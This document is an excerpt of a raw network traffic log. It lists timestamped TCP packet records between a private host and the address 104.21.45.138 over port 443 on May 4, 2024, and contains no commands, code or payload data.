May 4, 2024 09:48:40.450948954 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.450989008 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.451004982 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.451009989 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.451025009 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.451963902 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.452012062 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.452018976 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.452056885 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.452940941 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.452991962 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.453774929 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.453819036 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.453825951 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.453830004 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.453860998 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.454638004 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.454693079 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.455848932 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.455902100 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.456737995 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.456793070 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.456798077 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.457706928 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.457740068 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.457750082 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.457755089 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.457781076 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.458633900 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.458682060 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.458688021 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.458728075 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.459371090 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.459425926 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.460324049 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.460376978 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.461158991 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.461225033 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.462076902 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.462142944 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.462372065 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.462424040 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.463318110 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.463373899 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.466085911 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.466100931 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.466166019 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.466172934 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.468050957 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.468096972 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.468154907 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.468162060 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.468179941 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.468209028 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.470982075 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.470999002 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.471100092 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.471107006 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.473056078 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.473556042 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.473571062 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.473625898 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.473632097 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.473684072 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.477309942 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.477325916 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.477382898 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.477389097 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.477440119 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.479715109 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.479729891 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.479793072 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.479799986 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.479846954 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.482464075 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.482480049 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.482536077 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.482542992 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.482780933 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.486166000 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.486181021 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.486242056 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.486248970 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.486299992 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.608335972 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.608361959 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.608464003 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.608474970 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.608525038 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.611929893 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.611954927 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.611993074 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.611998081 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.612015009 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.612031937 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.613986015 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.614005089 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.614063978 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.614070892 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.614126921 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.617515087 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.617535114 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.617588997 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.617594957 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.617656946 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.620341063 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.620404005 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.620434046 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.620440006 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.620516062 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.620516062 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.625597954 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.625617027 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.625670910 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.625691891 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.625706911 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.625735044 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.626337051 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.626354933 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.626405954 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.626414061 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.626461029 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.629750013 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.629772902 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.629828930 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.629837990 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.629945993 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.631793976 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.631808996 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.631860971 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.631867886 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.631913900 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.634610891 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.634625912 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.634681940 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.634687901 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.634742022 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.637373924 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.637388945 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.637438059 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.637449026 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.637495041 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.640667915 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.640682936 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.640732050 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.640738010 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.640784979 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.643877983 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.643892050 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.643944979 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.643951893 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.644001007 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.648422003 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.648438931 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.648492098 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.648499012 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.648554087 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.649302959 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.649343014 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.649375916 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.649385929 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.649399996 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.649442911 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.653070927 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.653086901 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.653136969 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.653143883 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.653209925 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.655889034 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.655904055 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.655958891 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.655966043 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.656027079 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.658835888 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.658854008 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.658921003 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.658931971 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.658977985 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.662097931 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.662148952 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.662172079 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.662178993 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.662200928 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.662220001 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.664030075 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.664045095 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.664098024 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.664108038 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.664155006 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.666733027 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.666748047 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.666799068 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.666805983 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.666852951 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.669294119 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.669311047 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.669368982 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.669374943 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.671298981 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.672832012 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.672847986 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.672925949 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.672933102 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.675077915 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.675576925 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.675595045 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.675668955 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.675679922 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.675931931 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.678375959 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.678390980 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.678442955 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.678452969 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.678488016 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.681693077 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.681710958 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.681771994 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.681780100 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.681826115 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.687706947 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.687721968 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.687798977 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.687805891 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.687848091 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.769403934 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.769423008 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.769480944 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.769511938 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.769530058 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.769543886 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.772131920 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.772149086 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.772196054 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.772202015 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.772223949 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.772252083 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.774821043 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.774842024 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.774887085 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.774897099 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.774919033 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.774982929 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.777993917 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.778008938 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.778047085 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.778053999 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.778080940 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.778099060 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.783446074 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.783463001 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.783498049 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.783512115 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.783524990 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.783545017 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.783611059 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.783626080 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.783649921 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.783658028 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.783720970 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.783838034 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.787157059 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.787170887 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.787256956 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.787280083 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.787293911 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.787323952 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.790297031 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.790313005 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.790394068 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.790405989 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.790429115 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.790441990 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.793103933 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.793118954 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.793174982 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.793198109 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.793217897 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.793236971 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.795731068 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.795753002 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.795789957 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.795799971 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.795825958 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.795844078 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.799423933 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.799439907 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.799474955 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.799489021 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.799509048 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.799534082 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.802459002 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.802474022 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.802535057 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.802552938 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.804733992 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.804757118 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.804791927 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.804807901 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.804853916 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.805175066 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.807456017 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.807476997 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.807513952 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.807537079 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.807550907 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.807574987 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.810772896 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.810794115 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.810841084 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.810853004 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.810868979 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.810882092 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.813755989 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.813770056 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.813837051 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.813860893 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.816473007 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.816507101 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.816555023 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.816593885 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.816622019 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.817174911 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.819850922 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.819865942 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.819930077 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.819946051 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.821191072 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.821717024 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.821732044 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.821787119 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.821820021 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.825191021 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.826164007 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.826180935 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.826242924 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.826257944 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.828073025 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.828092098 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.828167915 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.828182936 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.829184055 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.831505060 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.831520081 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.831588030 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.831610918 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.833192110 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.834117889 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.834131956 CEST	443	49737	104.21.45.138	192.168.2.4
